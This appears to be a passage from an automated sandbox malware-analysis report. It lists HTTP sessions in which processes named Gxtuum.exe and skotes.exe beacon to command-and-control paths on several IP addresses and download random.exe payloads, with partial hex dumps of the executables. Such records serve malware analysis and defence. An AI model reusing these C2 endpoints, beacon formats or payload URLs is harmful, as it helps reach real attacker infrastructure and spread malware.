                                                                                                                                                                                                                                                              Data Ascii: d:,5?<ClDBg8:%*Ucx!nW`qo]rKgQM"7FmR+O|P~[t;qG~h[&IKyap}y$o2L2J>n41_T}*[g'HTx.1x}SW\cp'^X}U'J\^]
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.117628098 CET1236INData Raw: 09 22 12 48 b3 60 1e a4 4d 5f 8b db b9 f1 68 61 ac 48 35 f5 a7 dd ae 36 5a 9b 41 a9 00 bb 29 ca 4c 97 fd 3c e7 05 37 3e dd 8a 63 b1 5e cd bd a7 d6 70 24 9c c7 76 4f 89 be 97 b5 72 98 90 3d 51 ef 86 c1 10 08 bc d4 fd e6 1c a2 fc c3 d2 30 a7 88 7c
                                                                                                                                                                                                                                                              Data Ascii: "H`M_haH56ZA)L<7>c^p$vOr=Q0|vu@j>4Mt0<nEJ?)j{H]N%k_&&hWa0n_IIsD.2|8%sAB}%@nX*YW1VM8g<^hk
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.117664099 CET1236INData Raw: 54 22 63 da e7 cd 1e d9 a8 0c 76 cf 30 11 d4 97 89 4e 38 d6 cd 59 bb 3f 12 2e 17 5e 1e bd 43 2a 82 7c c8 74 1a 4d 14 78 ea f2 4f 8c 3f 14 03 fc e4 74 0c 7a 56 e5 f2 28 ba 85 f0 e1 74 73 c7 3f 21 4a 68 9f d5 6a 6c 40 1f 07 32 ae 16 d1 02 13 9c 16
                                                                                                                                                                                                                                                              Data Ascii: T"cv0N8Y?.^C*|tMxO?tzV(ts?!Jhjl@2HZ:iVmT]|o~3Z?%&D`$92~yb\PN+apFb$bioDvEN|1Q4o'pFT}99_%ym>5vR+],'
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.118302107 CET1236INData Raw: 1c 2e 1e f7 ce db 92 c5 55 97 7b 26 34 56 37 81 8f 35 cf 4c 75 c6 fc db d1 ec 41 ed 39 87 5a a0 7d 97 8b 54 cd 1a 05 ab 71 97 f8 0c c8 5a aa da 92 91 21 1b a9 fd ac 21 7a 5a ef 95 78 7b 80 bb d6 8c fd 65 c2 69 9d 76 52 87 9f dd 49 de 3f 0a b3 91
                                                                                                                                                                                                                                                              Data Ascii: .U{&4V75LuA9Z}TqZ!!zZx{eivRI?Uh3z*e~Lb`_~(/88n?:| H'\;t^|D'e#d]WLc'NX|5d2V_mT{5-zYe;Llu<~zns:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.118336916 CET1236INData Raw: 08 54 61 7b 8e 65 70 64 5b fe 4e 56 3b 88 7c 42 e2 7b fa 67 9b 01 c2 7a 35 82 37 3b 69 b2 6d 87 7b 33 f4 41 b9 bf 43 9f 88 88 fa 1c 49 5a db 2a 8d 79 d8 d4 06 73 a8 bb aa 42 de ba 3a 83 48 07 bd 30 d1 79 20 09 14 ce 00 a5 05 06 de 0d 70 d8 dd 3a
                                                                                                                                                                                                                                                              Data Ascii: Ta{epd[NV;|B{gz57;im{3ACIZ*ysB:H0y p:&d8g[ycBxXC_omeejq;l:>|kj5wQC76aF$*eG-(*]cut}lRUmPZIi3aV0Lf6oqp4$
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.236839056 CET1236INData Raw: 01 55 a1 5e 38 ca 88 47 0f 81 39 cc 01 ac f8 81 09 8b f6 f8 98 1b 96 a4 05 71 62 f3 dd c4 89 76 b2 c6 4d 0b f3 1f b3 37 dd 3b 29 2f 31 b9 99 be ae ac 57 a9 05 40 d1 42 09 aa d9 ea f2 49 e6 5e ee 2c 62 13 ae 22 d3 4a 85 95 30 33 5d 6d df dd 43 19
                                                                                                                                                                                                                                                              Data Ascii: U^8G9qbvM7;)/1W@BI^,b"J03]mCKdb\!w#Qk6>1D&DEz}A&?f0xRpA,6UfmPp%tO\G2"$,U%QDdmc;~:0Z-L


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              27192.168.2.449945212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:12.638530970 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:13.974750042 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:13 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              28192.168.2.44994731.41.244.11802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.286479950 CET62OUTGET /files/burpin1/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.390877008 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:15 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 4438776
                                                                                                                                                                                                                                                              Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "675784f0-43baf8"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.390959978 CET1236INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                                                                                              Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3D$tlA
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.390985966 CET1236INData Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5
                                                                                                                                                                                                                                                              Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.391021013 CET1236INData Raw: 7d c4 0f 84 d0 02 00 00 66 83 7d c4 08 0f 85 c5 02 00 00 ff 75 cc 8d 4d f0 e8 76 f8 ff ff 8d 45 f0 50 8d 46 10 50 8d 45 e4 50 8d 5e 28 e8 1f fc ff ff 83 c4 0c 50 8b cb e8 90 f8 ff ff ff 75 e4 e8 b6 76 01 00 39 7d 14 59 0f 85 6f 02 00 00 8b 46 0c
                                                                                                                                                                                                                                                              Data Ascii: }f}uMvEPFPEP^(Puv9}YoFURjuf}f}PQ;EtMu{v}Y^f9}u~@-f}t jeVPMXuFvY,EF@FURjuPQ;Eu3f9}URjuF<F
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.391057014 CET1236INData Raw: a2 41 00 8b f8 3b fe 74 33 56 6a 01 6a 01 57 ff 15 a4 a2 41 00 56 56 56 8d 45 e4 50 ff 15 a8 a2 41 00 8d 45 e4 50 ff 15 ac a2 41 00 6a 01 57 ff 15 b0 a2 41 00 57 ff 15 b4 a2 41 00 5f 5e c9 c3 53 ff 74 24 08 ff 15 94 a2 41 00 8b d8 85 db 75 02 5b
                                                                                                                                                                                                                                                              Data Ascii: A;t3VjjWAVVVEPAEPAjWAWA_^St$Au[VW|$Wt$A5AWSWS_3^@[UDSVWjpA5XAAPuuSuhuuSt&utWS\AWS`AtPdAz=Auo5h
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.391096115 CET1236INData Raw: 59 8b 4d fc 41 51 50 89 45 f8 8d 45 98 50 ff d3 3b 45 fc 77 40 ff d7 85 c0 75 3a 8b 86 bc e0 41 00 85 c0 74 25 8b 7d f8 57 50 ff 15 2c a1 41 00 85 c0 74 13 ff b6 bc e0 41 00 e8 14 6d 01 00 89 be bc e0 41 00 eb 16 57 eb 0e 8b 45 f8 89 86 bc e0 41
                                                                                                                                                                                                                                                              Data Ascii: YMAQPEEP;Ew@u:At%}WP,AtAmAWEAulYuAAAA9t;AuS0AG3jZGQl=AYAu:%AjXPAhP4A~XP
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.391133070 CET1236INData Raw: 20 a1 41 00 85 c0 74 37 8b 4d d4 33 c0 3b c8 77 2e 72 08 8b 45 d0 3b 45 08 73 24 6a 2b e8 70 fa ff ff 50 e8 86 6b 00 00 83 f8 01 59 59 74 09 83 0d c8 e9 41 00 ff eb ae 83 0d c8 e9 41 00 02 33 c0 40 c9 c3 ff 74 24 04 e8 8d ff ff ff 85 c0 59 75 01
                                                                                                                                                                                                                                                              Data Ascii: At7M3;w.rE;Es$j+pPkYYtAA3@t$Yujht$jAt$jYu%8AV3Wt$FFYW.t$6YY~_^D$V;F|P^VWt$YWFt$AP
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.391422987 CET1236INData Raw: e8 c0 e2 ff ff 66 83 24 46 00 59 89 45 f8 8d 45 f4 50 8b cf e8 64 e5 ff ff 56 e8 8c 63 01 00 59 5b 5f 5e c9 c3 55 8b ec b8 20 10 00 00 e8 cf 63 01 00 53 56 57 8b 7d 08 8b 07 33 db 53 53 53 53 57 ff 50 10 8b 45 14 ff 75 0c 8b 35 30 a1 41 00 89 58
                                                                                                                                                                                                                                                              Data Ascii: f$FYEEPdVcY[_^U cSVW}3SSSSWPEu50AXuEE3]]]}MQ+Q5QWPE;3E8]t=+E;w`uuubE:EtuMvGE+
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.391458035 CET332INData Raw: 46 02 eb 22 8d 46 02 66 83 38 7b 75 02 8b f0 0f b7 06 50 8b cb e8 e8 e3 ff ff 03 f7 0f b7 06 66 85 c0 75 c6 8b c6 5f 5e 5b c3 8b 4c 24 04 56 6a 5c e8 25 f7 ff ff 8b 4c 24 08 6a 2f 8b f0 e8 18 f7 ff ff 3b c6 7e 02 8b f0 8b c6 5e c3 56 57 8b 7c 24
                                                                                                                                                                                                                                                              Data Ascii: F"Ff8{uPfu_^[L$Vj\%L$j/;~^VW|$t$A~!FPPPt$Af$pw_^UtSVuWj@EPVAtIhAEPHAu6jV|Au)EVPvjhAutu]
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.391494989 CET1236INData Raw: ff 75 d0 ff 75 cc 68 04 08 00 50 68 84 a5 41 00 68 94 a6 41 00 53 ff 15 a0 a2 41 00 8b f8 3b fb 0f 84 7b ff ff ff 56 ff 15 b4 a2 41 00 8b 35 b8 a2 41 00 53 6a 22 68 59 04 00 00 57 ff d6 6a 0f ff 15 cc a2 41 00 50 53 68 43 04 00 00 57 ff d6 b8 e9
                                                                                                                                                                                                                                                              Data Ascii: uuhPhAhASA;{VA5ASj"hYWjAPShCWPEEPEP]uEPhaWu]u]YYUQSVW=(AjEPuuTCPECSuPu>Wf$GYF_^[Vj
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.510691881 CET1236INData Raw: 01 eb 2b ff 75 10 ff 75 fc eb 06 ff 75 10 ff 75 f8 57 e8 5c f6 ff ff 83 c4 0c 8d 4d a4 8a d8 e8 b9 ef ff ff ff 75 e0 e8 8b 58 01 00 8a c3 59 5f 5e 5b c9 c3 55 8b ec 83 ec 18 53 56 57 8b 7d 08 57 ff 15 f4 a0 41 00 57 8d 4d e8 8b d8 89 45 fc e8 5f
                                                                                                                                                                                                                                                              Data Ascii: +uuuuW\MuXY_^[USVW}WAWME_39uVMD_f=\}tf=/uft_K]"wf=/tf=\tNf$wWYtEPAWAuEPWYYt3WYuWjj_[


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              29192.168.2.449953212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:15.950953960 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:17.276853085 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:17 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              30192.168.2.449960212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:18.901438951 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:20.238950014 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:20 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              31192.168.2.449967212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:22.024346113 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:23.344799042 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:23 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              32192.168.2.449974212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:25.300949097 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:26.611053944 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:26 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              33192.168.2.449978185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:25.642775059 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019807001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:26.991192102 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:26 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              34192.168.2.44998031.41.244.11802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:27.127130032 CET62OUTGET /files/unique2/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.444703102 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:28 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 1959936
                                                                                                                                                                                                                                                              Last-Modified: Sun, 22 Dec 2024 00:12:20 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "67675964-1de800"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 40 01 00 00 00 00 00 00 30 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 86 00 00 04 00 00 c5 0a 1e 00 02 00 00 80 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$inG@ZRZCZUZ\ZBZGRichPEL,e@0@`[Ao@ @N@.rsrc@p^@.idata A@ )A@tsdsdsrb0k@qtylzonp @.taggant00"@
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.444756031 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.444791079 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.444920063 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.444950104 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:28.444987059 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: mDV^it`ld
